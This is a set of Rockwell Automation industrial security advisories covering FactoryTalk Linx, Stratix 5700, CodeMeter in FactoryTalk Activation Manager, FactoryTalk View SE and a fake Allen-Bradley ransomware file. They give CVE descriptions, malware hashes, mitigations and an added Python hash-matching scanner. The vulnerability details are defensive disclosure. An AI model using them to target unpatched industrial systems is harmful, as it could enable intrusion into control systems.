Rockwell Automation PSIRT received a report from Claroty, an industrial security product vendor and research company, regarding three vulnerabilities in FactoryTalk® Linx software. If successfully exploited, these vulnerabilities may result in denial-of-service conditions, control of the execution flow, or information disclosure. If the vulnerabilities are chained together, it may be possible to achieve remote code execution.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Special thanks to Claroty for discovering these vulnerabilities.

Affected Products

FactoryTalk Linx v6.11 and earlier.

Vulnerability Details

CVE-2020-27251: Remote Code Execution due to Heap Overflow
A heap overflow vulnerability exists within FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send malicious port ranges, which could result in remote code execution.

CVSS v3.1 Base Score: 9.8/10 [Critical]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2020-27253: Denial-of-service due to a flaw in Ingress/Egress checks routine
A flaw exists in the Ingress/Egress checks routine of FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to specifically craft a malicious packet resulting in a denial-of-service condition on the device.

CVSS v3.1 Base Score: 8.6/10 [High]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVE-2020-27255: Information Disclosure and ASLR bypass due to Heap Overflow
A heap overflow vulnerability exists within FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send malicious set attribute requests, which could result in leaking sensitive information. This information disclosure could lead to the bypass of Address Space Layout Randomization (ASLR).

CVSS v3.1 Base Score: 5.3/10 [Medium]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N



Risk Mitigation & User Action


Customers using the affected FactoryTalk Linx are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Details: CVE-2020-27253, CVE-2020-27251, CVE-2020-27255
Recommended User Actions: For FactoryTalk Linx v6.10 and v6.11, see Patch Answer ID BF25509.

Additionally, the user could move to v6.20, which is available on the PCDC.

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation® products is available at Knowledgebase Article ID QA17329.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • https://us-cert.cisa.gov/ics/advisories/icsa-20-329-01

PN1534 | PN1534 | Stratix 5700 HTTP Session Management Weakness
Published Date:
October 30, 2020
Last Updated:
October 30, 2020
Products:
Stratix 5700 Managed Switch
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - October 30, 2020. Initial Release.

Executive Summary

Rockwell Automation’s PSIRT received a report from Amazon regarding a weakness on the Stratix 5700 switch. This weakness is a result of HTTP session management not being a feature of classic Cisco IOS. This may result in unauthenticated access to the web interface if an attacker gains access to the authenticated user’s computer after the “Logout” button has been selected. Rockwell Automation’s PSIRT has collaborated with the Cisco PSIRT to inform customers of this weakness. While this button’s function may lead the user to believe the session is being cleared, the product specifications do not advertise HTTP session management as a function. Both PSIRTs, to be transparent, see the importance of sharing this issue along with potential mitigation options.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products.

Affected Products

Allen-Bradley Stratix 5700 Industrial Managed Ethernet Switches –
  • All Cisco IOS releases (with the exception of those which incorporate the new HTTP session management feature added through Cisco BugID CSCvo20762) lack HTTP and HTTPS session management capabilities.

Details

On the Stratix 5700 Industrial Managed Ethernet switch running Cisco IOS, because no session management is performed for HTTP or HTTPS sessions, the only way to close and terminate an active HTTP or HTTPS management session is to close the web browser used for this session after the user is done. Closing the active tab or active window is not enough - the browser instance must be terminated.

If the browser instance has not been terminated, an actor with local access to the machine from which the session was established may be able to restart the management session without being prompted for any credentials, which would result in this actor having the same kind of access to the device as the user on the previous session.

Risk Mitigation & User Action

As of 26-OCT-2020, the following releases incorporate the new HTTP session management code: 15.9(3)M2, 15.9(3)M2a and 15.2(7)E3. Going forward, it is the intention of Cisco for this HTTP session management feature to be implemented in all future Cisco IOS classic releases.

If HTTP session management is desired while running a release which does not support the enhancement, Cisco IOS customers are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

Completing the following precautionary measure is recommended as a risk mitigation strategy against unauthenticated attackers.
  • Terminate the browser when finished – closing the tab or window is NOT enough

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or other similar Whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
General Mitigations
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls, and isolate them from the business network.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

PN923 | PN923 | Claims of ransomware masquerading as an Allen-Bradley Update
Published Date:
October 02, 2020
Last Updated:
October 02, 2020
Products:
Compliance / Audit Trail / Security, 6181X Hazardous Non-Display, ProcessPak, Integration Manager, SOS, dsShopLib, RSLogix 500, Arena, Foundation Server, Shop Operations, Reporting (form based), RSView32 WebServer, Database, FactoryTalk ViewPoint, SPC, Admin Tools, RSView32 SPC, FactoryTalk VantagePoint, App Solutions Documentation, Business Objects, Migration, Studio 5000 View Designer, 650R Non-Display Computers, 750R Non-Display Computers, FactoryTalk View SE, Reporting, Interface Manager, Operator Certification, RSLogix 5, Live Transfer, 6181 Computers, 1450R Non-Display Computers, RSLogix Emulate 5000 / Studio 5000 Logix Emulate, LiveData, Agile, Installation, RSLogix Emulate 500, Knowledge Documentation, RSLogix Emulate 5, Build Utility, Shop Operation, Foundation Client, NCR/CAR/IQA, RSView32, FactoryTalk Activation, Purge, FactoryTalk Historian SE, WSIntegrate, SoftLogix5800, RSView32 Messenger, FactoryTalk Linx Gateway, Supplier Manager, RSView32 Active Display, Maintenance Releases, Connected Components Workbench, Documentation, Activities, ETL, Historical Transfer, ECO, 6180 Computers with Keypad, Production Management Client, RSLadder, RMA, Data, Thin Client, Logix Designer, Administration, 6155 Compact Computers, Production Execution Client, Installation, 6181X Hazardous Integrated Display, Dashboard, JD Edwards, ActiveX Control, FactoryTalk Metrics, TrendX, Universe Manager, FactoryTalk AssetCentre, Knowledge Installation, Sampling Plans, Configuration Tool, FactoryTalk Transaction Manager, Consumer Packaged Goods Suite, Reports (Out-of-box), PlantMetrics, API, FactoryTalk Batch, FactoryTalk EnergyMetrix, FactoryTalk View ME, SoftLogix5, Process Designer, Reports (Custom), Automotive Suite , Quality Assurance (6.x), ICAPA, RSLogix Architect / Studio 5000 Architect, Equipment Manager, PlantPAx, Complaint Handling, Pavilion, FactoryTalk Services Platform
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

Claims of ransomware masquerading as an Allen-Bradley Update

Description




Version 2.0 - July 8th 2016

Rockwell Automation has learned about the existence of a malicious file called "Allenbradleyupload.zip" that is being distributed on the internet. This file is NOT an official update from Rockwell Automation, and we have been informed that this file contains a type of ransomware malware that, if successfully installed and launched, may compromise the victim’s computer. This advisory is intended to raise awareness to control system owners and operators of reports of the file’s existence as a result of reports Rockwell Automation received from the Electricity Information Sharing and Analysis Center ("E-ISAC").

Update 08-JUL-2016: Our investigation has confirmed the existence of the reported malware through VirusTotal.com. According to VirusTotal, it "is a free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware." According to information on VirusTotal.com, the file "Allenbradleyupload.zip" contains a single file called "Allenbradleyupload.exe", which may be malicious. File hashes and links to VirusTotal.com are in the table that follows below. These file hash values can be used with Application Whitelisting technologies to reduce the ability of this malware to execute on a system. According to VirusTotal, most of the antivirus/anti-malware vendors have updated their databases to detect this malware. However, we strongly recommend ensuring that your antivirus programs and virus definitions are up to date.

File Name              | Hash Type | Hash Value
Allenbradleyupload.zip | MD5       | b552a95bd3eceb1770db622a08105f52
Allenbradleyupload.zip | SHA-1     | 4dbba01786068426c032a7524e31668f2435d181
Allenbradleyupload.zip | SHA-256   | e7b4a2c05e978b86a231fa276db29bb8362bd25160bdeb4c2239cb614d7f44df
Allenbradleyupload.exe | MD5       | 49067f7b3995e357c65e92d0c7d47c85
Allenbradleyupload.exe | SHA-1     | 5f8c4246fc24d400dffef63f25a44b61932b13af
Allenbradleyupload.exe | SHA-256   | 97ec86160dea82a17521a68076fe0d5537f60577b79338e67a15528115e94b88
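The advisory notes that these hash values can be used with application whitelisting technologies; they serve equally as indicators of compromise for a file-system sweep. The following Python is an added example written for this page, not a Rockwell Automation tool. The indicator table is copied from the advisory; everything else is assumed: the benign sample bytes are constructed here so the code runs offline, and the positive-match case uses a second, constructed indicator table built from that sample rather than any real malware.

```python
"""Match file contents against published hash IoCs (added example).

The three algorithms are the ones the advisory lists (MD5, SHA-1, SHA-256).
Matching is by content only: the file name on disk is ignored, since a
renamed copy of the same payload hashes identically.
"""
import hashlib
import os

# Indicators copied from the PN923 advisory table above.
ADVISORY_IOCS = {
    "Allenbradleyupload.zip": {
        "md5": "b552a95bd3eceb1770db622a08105f52",
        "sha1": "4dbba01786068426c032a7524e31668f2435d181",
        "sha256": "e7b4a2c05e978b86a231fa276db29bb8362bd25160bdeb4c2239cb614d7f44df",
    },
    "Allenbradleyupload.exe": {
        "md5": "49067f7b3995e357c65e92d0c7d47c85",
        "sha1": "5f8c4246fc24d400dffef63f25a44b61932b13af",
        "sha256": "97ec86160dea82a17521a68076fe0d5537f60577b79338e67a15528115e94b88",
    },
}

ALGORITHMS = ("md5", "sha1", "sha256")


def hash_bytes(data):
    """Return lowercase hex digests of `data` for the three advisory algorithms."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in ALGORITHMS}


def hash_file(path, chunk_size=1 << 20):
    """Stream a file through all three hashes without loading it whole."""
    hashers = {algo: hashlib.new(algo) for algo in ALGORITHMS}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(chunk)
    return {algo: h.hexdigest() for algo, h in hashers.items()}


def build_index(iocs):
    """Invert an IoC table into {(algorithm, digest): indicator_name} so a
    lookup is one dictionary probe whichever algorithm a report used."""
    index = {}
    for name, digests in iocs.items():
        for algo, digest in digests.items():
            index[(algo, digest.lower())] = name
    return index


def match_digests(digests, index):
    """Return the indicator name for the first matching digest, else None."""
    for algo, digest in digests.items():
        hit = index.get((algo, digest))
        if hit:
            return hit
    return None


def match_bytes(data, iocs=ADVISORY_IOCS):
    """Check an in-memory blob (e.g. an e-mail attachment) against `iocs`."""
    return match_digests(hash_bytes(data), build_index(iocs))


def scan_tree(root, iocs=ADVISORY_IOCS):
    """Walk a directory tree; return [(path, indicator_name)] for every hit.
    Unreadable files are skipped so one locked file does not abort the sweep."""
    index = build_index(iocs)
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                digests = hash_file(path)
            except OSError:
                continue
            name = match_digests(digests, index)
            if name:
                hits.append((path, name))
    return hits


# Constructed sample (not real malware) and a constructed indicator table
# derived from it, used only to exercise the positive-match path.
SAMPLE_BENIGN = b"constructed sample for this example; not the advisory file\n"
CONSTRUCTED_IOCS = {
    "sample-indicator": {"sha256": hashlib.sha256(SAMPLE_BENIGN).hexdigest()},
}

if __name__ == "__main__":
    print(match_bytes(SAMPLE_BENIGN))                    # None: no advisory hash matches
    print(match_bytes(SAMPLE_BENIGN, CONSTRUCTED_IOCS))  # sample-indicator
```

For a real sweep, call `scan_tree` on the download and temporary directories of engineering workstations with the default advisory table; a hit on any one algorithm is reported, so the check still works when a ticket or vendor report carries only an MD5.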

Rockwell Automation confirms that this malware is NOT an official product update and it is not connected with any Rockwell automation product, software update, or website.

Rockwell Automation decided to provide this advisory since the attackers have used the Rockwell Automation brand name on the file, possibly as a means to increase the likelihood of an ICS-knowledgeable user to download and execute the malware as part of their strategy. We are continuing to monitor this situation, and we will update this advisory as we learn more.

BACKGROUND

Ransomware is a class of malware that aims to extort money from the victim by restricting access to resources on the computer, and then demands a monetary ransom in order to remove the restrictions. The most common type is ransomware that will encrypt important files on an infected computer, rendering the files unusable without paying a ransom. Other types may restrict access to operating system functions or specific applications. Typically the user is required to pay the ransom in some form of untraceable currency, and must do so before the deadline expires and the decryption key is destroyed.

According to the September/October 2015 issue of the ICS-CERT Monitor, "Ransomware, such as Cryptolocker or TeslaCrypt, is currently one of the most prolific categories of malware growth, rising 165 percent in varieties seen between the fourth quarter of 2014 and the first quarter of 2015".

CUSTOMER RISK MITIGATIONS

Where feasible, precautions and risk mitigation strategies against this type of attack, like those listed below, are recommended. When possible, multiple strategies should be employed simultaneously.

  • Obtain product software and firmware from Rockwell Automation’s official download portal, available at http://www.rockwellautomation.com/global/support/drivers-software-downloads.page.
  • Follow industry best-practices to harden your PCs and Servers, including anti-virus/anti-malware and application whitelisting solutions. These recommendations are published in KB546987.
    • Consult VirusTotal.com’s analysis of the malware (using the links above), to determine if your deployed antivirus solution is able to detect this malware. (UPDATED 08-JUL-2016)
  • Analyze outbound network traffic against the known indicators of compromise (IoC), available from the US-CERT portal, to identify and assess the risk of any unusual network activity.
  • Develop, and then deploy, backup and disaster recovery policies and procedures. Test backups on a regular schedule.
  • Implement a change management system to archive network, controller and computer assets (e.g., clients, servers and applications).
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack, which can also serve as a vehicle for malware infection.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and devices behind firewalls, and isolate them from the business network.

Refer to http://www.rockwellautomation.com/rockwellautomation/products-technologies/network-technology/architectures.page? for comprehensive information about implementing validated architectures designed to deliver these measures.

We also recommend concerned customers continue to monitor this advisory, Rockwell Automation’s Security Advisory Index at https://www.rockwellautomation.com/en-us/company/about-us/sustainability/trust-security/security-advisories.html, and the company public security webpage at http://www.rockwellautomation.com/security for new and relevant information relating to this matter.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security.


Critical
PN1530 | PN1530 | FactoryTalk Activation Manager affected by CodeMeter Vulnerabilities
Published Date:
September 18, 2020
Last Updated:
September 18, 2020
CVE IDs:
CVE-2020-14517, CVE-2020-16233, CVE-2019-14519, CVE-2020-14519, CVE-2020-14515, CVE-2020-14509, CVE-2020-14513
Products:
FactoryTalk Activation
CVSS Scores:
7.4, 8.1, 9.4, 7.5, 10.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
4.0
Revision History
Version 4.0 -- September 18, 2020. Update to reflect current mitigations. Updated links.
Version 3.0 -- September 16, 2020. Update to reflect current remediations and information from Wibu. See update below.
Version 2.1 -- September 15, 2020. Update to adjust language.
Version 2.0 -- September 14, 2020. Update regarding affected CodeMeter versions and vulnerability information.
Version 1.0 – September 08, 2020

Executive Summary

Rockwell Automation received a report from Claroty, an industrial security product vendor and research company, regarding vulnerabilities in Wibu-Systems’ CodeMeter. These vulnerabilities, if successfully exploited, may result in remote code execution, privilege escalation, or denial of service conditions to the products dependent on CodeMeter. CodeMeter is distributed as part of the installation for FactoryTalk Activation Manager. FactoryTalk Activation Manager enables customers to manage licensed content and activate Rockwell Automation software products.

Claroty has released documentation that outlines the vulnerabilities in detail. This information may make it easier for an adversary to compromise the host running Wibu CodeMeter. Customers using the affected versions of FactoryTalk Activation Manager and/or CodeMeter should implement the mitigations detailed below as soon as possible.

Affected Products

FactoryTalk Activation (FTA) Manager v4.05.00 and earlier running Wibu-Systems CodeMeter v7.10 or earlier.

The following products require FactoryTalk Activation Manager to store and keep track of Rockwell Automation software products and activation files. Customers who have any of the products in the following list in their install base also have FactoryTalk Activation Manager installed.
  • Arena® software
  • Emonitor® software
  • FactoryTalk® AssetCentre software
  • FactoryTalk® Batch software
  • FactoryTalk® EnergyMetrix™ software
  • FactoryTalk® eProcedure® software
  • FactoryTalk® Gateway software
  • FactoryTalk® Historian Site Edition (SE) software
  • FactoryTalk® Historian Classic software
  • FactoryTalk® Information Server software
  • FactoryTalk® Metrics software
  • FactoryTalk® Transaction Manager software
  • FactoryTalk® VantagePoint® software
  • FactoryTalk® View Machine Edition (ME) software
  • FactoryTalk® View Site Edition (SE) software
  • FactoryTalk® ViewPoint software
  • RSFieldbus™ software
  • RSLinx® Classic software
  • RSLogix 500® software
  • RSLogix 5000® software
  • RSLogix™ 5 software
  • RSLogix™ Emulate 5000 software
  • RSNetWorx™ software
  • RSView®32 software
  • SoftLogix™ 5800 software
  • Studio 5000 Architect® software
  • Studio 5000 Logix Designer® software
  • Studio 5000 View Designer® software
  • Studio 5000® Logix Emulate™ software

Vulnerability Details

CVE-2020-14509: Arbitrary Command Execution Due to Buffer Access with Incorrect Length Value of CodeMeter
The packet parsing mechanism of CodeMeter does not verify its length field values, causing it to access memory outside the bounds of the buffer. This may allow an attacker to execute arbitrary commands by sending a specifically crafted packet. This out-of-bounds memory access could also lead to memory corruption, causing denial-of-service conditions by crashing the CodeMeter server.

CVSS v3.1 Base Score: 10.0/10 [CRITICAL]
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2020-14517: Arbitrary Command Execution Due to the Inadequate Encryption Strength of CodeMeter
A vulnerability exists in the encryption scheme of CodeMeter, which allows a bypass of the protection mechanism, enabling the server to accept external connections without authentication. This may allow an attacker to remotely communicate with the CodeMeter API and to access and modify application data.

CVSS v3.1 Base Score: 9.4/10 [CRITICAL]
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H

CVE-2019-14519: Denial-of-Service Conditions Due to the Origin Validation Errors of CodeMeter
The API of the WebSocket internals of CodeMeter does not provide authentication on its WebSocket services. This may allow an attacker to cause denial-of-service conditions by sending a specifically crafted JavaScript payload allowing alteration or creation of license files.

CVSS v3.1 Base Score: 8.1/10 [HIGH]
CVSS Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

CVE-2020-16233: Denial-of-Service Conditions Due to the Improper Resource Release of CodeMeter
A vulnerability exists in the internal program resource management of CodeMeter, which allows the disclosure of heap memory. This may allow an attacker to cause denial-of-service conditions by triggering an intentional resource leak.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2020-14513: Denial-of-Service Conditions Due to Improper Input Validation of CodeMeter
A vulnerability exists in the input validation method of CodeMeter that can affect its program control flow or data flow. This may allow an attacker to alter the control flow and cause denial-of-service conditions to CodeMeter and any product dependencies by using a specifically crafted license file.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-14515: Denial-of-Service Condition or Data Modification due to Improper Verification of a Cryptographic Signature in CodeMeter
A vulnerability exists in the license-file signature checking mechanism, which may allow an attacker to build arbitrary license files, including forging a license file so that it passes as a valid license file of an existing vendor. This may allow an attacker to modify data or could cause a denial-of-service condition to CodeMeter.

CVSS v3.1 Base Score: 7.4/10 [HIGH]
CVSS v3.1 Vector: AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:H

Risk Mitigation & User Action

UPDATE (4.0)
Customers using the affected versions of FactoryTalk Activation Manager are encouraged to update to v4.05.01. This version of FactoryTalk Activation Manager contains CodeMeter 7.10a, which addresses the vulnerabilities. Customers who are unable to patch are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability: CVE-2020-14517, CVE-2020-16233, CVE-2020-14513, CVE-2020-14509, CVE-2020-14519, CVE-2020-14515
Currently Installed: FactoryTalk Activation Manager v4.05.00 and earlier
Suggested Actions: Update to version 4.05.01 of FactoryTalk Activation Manager. Select the FactoryTalk Activation Manager download from our website.

This information can also be found in Compatibility & Downloads > Configured Views > Standard Views > Software Latest Versions > FactoryTalk Activation.

UPDATE (3.0)
Customers using the affected products are encouraged to update to an available software revision that addresses the associated risk. As of September 16, 2020, CodeMeter 7.10a is compatible with FactoryTalk Activation Manager via the Rockwell Automation Product Compatibility and Download Center (PCDC). This version of CodeMeter remediates all of the vulnerabilities noted below. Customers can update CodeMeter directly from Wibu, which is compatible with all supported versions of FTA. A bundled version of CodeMeter 7.10a and FactoryTalk Activation Manager will also release in the coming days.

Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability: CVE-2020-14517, CVE-2020-16233, CVE-2020-14513, CVE-2020-14509, CVE-2020-14519, CVE-2020-14515
Currently Installed: FactoryTalk Activation Manager v4.05.00 and earlier
Suggested Actions: Update to version 7.10a of CodeMeter found on the Rockwell Automation PCDC, which is compatible with all supported versions of FTA.

This information can also be found in Compatibility & Downloads > Configured Views > Standard Views > Software Latest Versions > FactoryTalk Activation.

Previous Information Contained in Versions 1.0-2.1
Customers using the affected products are encouraged to update to an available software revision that addresses the associated risk for CVE-2019-14519, and CVE-2020-14515. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

For CVE-2020-14517, CVE-2020-16233, and CVE-2020-14513, FTA v4.05 or later mitigates these vulnerabilities unless CodeMeter is running as a server. Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available.

Vulnerability: CVE-2020-14519, CVE-2020-14515
Currently Installed: FactoryTalk Activation Manager v4.04.00 and earlier
Suggested Actions: Update to FTA v4.05 or later and employ the general security guidelines. For compatibility details about FactoryTalk Activation Manager, customers can consult the Product Compatibility and Download Center Standard Views > Software Latest Versions > FactoryTalk Activation.

Vulnerability: CVE-2020-14517, CVE-2020-16233, CVE-2020-14513, CVE-2020-14509
Currently Installed: FactoryTalk Activation Manager v4.04.00 and earlier
Suggested Actions: Update to FTA v4.05 or later and employ the general security guidelines.

The default configuration of FTA v4.05 limits the vulnerable port, which mitigates these vulnerabilities. However, if CodeMeter is running as a server, which can be turned on via FTA, customers should ensure they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. Refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices for deploying network segmentation and broader defense-in-depth strategies.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that any traffic from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware key switch setting, which may be used to block unauthorized changes.
  • Utilize the new REST API instead of the internal WebSockets API.
  • Disable the WebSockets API.
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN71
For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index.
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

Critical
PN1510 | PN1510 | FactoryTalk View SE Contains Multiple Vulnerabilities Found During Pwn2Own Competition
Published Date:
August 20, 2020
Last Updated:
August 20, 2020
CVE IDs:
CVE-2020-12027, CVE-2020-12028, CVE-2020-12029, CVE-2020-12031
Products:
FactoryTalk View SE
CVSS Scores:
7.5, 9.0, 7.3, 5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
2.2
Revision History
Version 2.2 - August 20, 2020 Links to additional detections
Version 2.1 - August 18, 2020 Links to additional detections
Version 2.0 - July 23, 2020. Updated guidance given public scripts.
Version 1.0 - June 18, 2020. Initial Release.

Executive Summary

Between January 21-23, 2020, Rockwell Automation participated in the Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI). This was ZDI’s first ever Industrial Control Systems (ICS) competition, which was held at the S4 Security conference in Miami, Florida. This competition invites researchers to demonstrate vulnerability exploitation on certain products, and responsibly disclose this information to participating vendors.

During the competition, Rockwell Automation was made aware of flaws in the way FactoryTalk View SE handles certain sensitive information, authentication mechanisms, and bounds checking, which could lead to Remote Code Execution (RCE).

Special thanks to the following researchers who submitted these vulnerabilities through the Pwn2Own competition: The Incite Team (Steven Seeley and Chris Anastasio), Claroty Research (Sharon Brizinov and Amir Preminger), Synacktiv (Lucas Georges), Tobias Scharnowski, Niklas Brietfeld, Ali Abbasi, Pedro Ribeiro, Radek Domanski, and Fabius Artrel.

As of July 23, 2020, the researchers, along with ZDI, have released documentation and a script that makes it possible for an unskilled adversary to compromise the host running FactoryTalk View SE. Customers using the affected versions of FactoryTalk View SE should apply the patch and implement the mitigations detailed below as soon as possible.

Customers using affected products are encouraged to evaluate their own systems and apply the appropriate risk mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk View SE all versions

Vulnerability Details

CVE-2020-12029: Code execution due to improper limitation of a pathname to a restricted directory
FactoryTalk View SE does not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE).

CVSS v3.1 Base Score: 9.0 (CRITICAL)
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
ZDI Tracking: ZDI-CAN-10284

CVE-2020-12031: Code execution due to improper bounds checking
FactoryTalk View SE fails to bounds-check monitor configurations. After bypassing memory corruption mechanisms found in the operating system, a local, authenticated attacker may corrupt the associated memory space allowing for arbitrary code execution. This attack depends on user interaction to be successful.

CVSS v3.1 Base Score: 7.5 (HIGH)
CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H
ZDI Tracking: ZDI-CAN-10270

CVE-2020-12028: Unauthenticated file permissions for remote endpoints
FactoryTalk View SE provides the capability to interact with remote endpoints, which are accessible by a series of handlers. A remote, authenticated attacker may be able to utilize certain handlers to interact with the data on the remote endpoint since those handlers do not enforce appropriate permissions. This attack depends on user interaction to be successful.

CVSS v3.1 Base Score: 7.3 (HIGH)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
ZDI Tracking: ZDI-CAN-10283


